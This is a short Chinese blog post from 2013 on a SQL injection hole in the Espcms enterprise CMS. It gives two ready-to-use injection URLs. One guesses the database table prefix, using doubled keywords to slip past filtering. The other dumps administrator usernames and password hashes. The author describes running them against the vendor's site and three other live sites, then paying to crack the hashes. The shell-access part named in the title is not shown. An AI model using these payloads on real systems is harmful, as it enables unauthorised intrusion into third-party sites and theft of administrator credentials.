易思企业系统Espcms注入漏洞+后台拿shell

feng 2013-03-10 6,516 ℃ 0条点评

作者：阿峰

博客：www.afeng.org

今天下午看到seay发表一篇文章，【Espcms 通杀 SQL注入漏洞分析附EXP+拿下官网】
下载了他的exp，找了几个网站，都没有爆出来，成功率很低，如图

我就找他调侃了一会，
刚开始他也不知道是怎么回事，后来听他说知道了...不知道他是否更新了...

关于漏洞文件和细节我就不说了，根据他的注入语句我重新修改了一下。

爆前缀：

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by afeng

有图有真相，先来测试一下espcms的官网吧，如图：

看到了吧，前缀是espcms...然后继续爆用户名和密码，无果。就去问了一下seay，他说官网已经修复了，好吧。
我们再来看看其他网站是如何的呢？

爆用户名和密码：

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

比如官方的前缀是espcms，那么在爆用户名和密码的时候，语句中的前缀二字要修改为espcms。
测试了三个站，成功率还是蛮高的，如图：

-------------------------分割线---------------------------------------------

-------------------------分割线---------------------------------------------

-------------------------分割线---------------------------------------------
我高高兴兴的拿去破解md5，次噢，提示您输入的密文格式不对，我仔细数了数33位，
第一次见，给泼了一盆凉水...我对比了一下这三个MD5，我惊喜发现最后一位都是数字1，
果断删去最后1位，再解，提示收费，好吧，果断购买。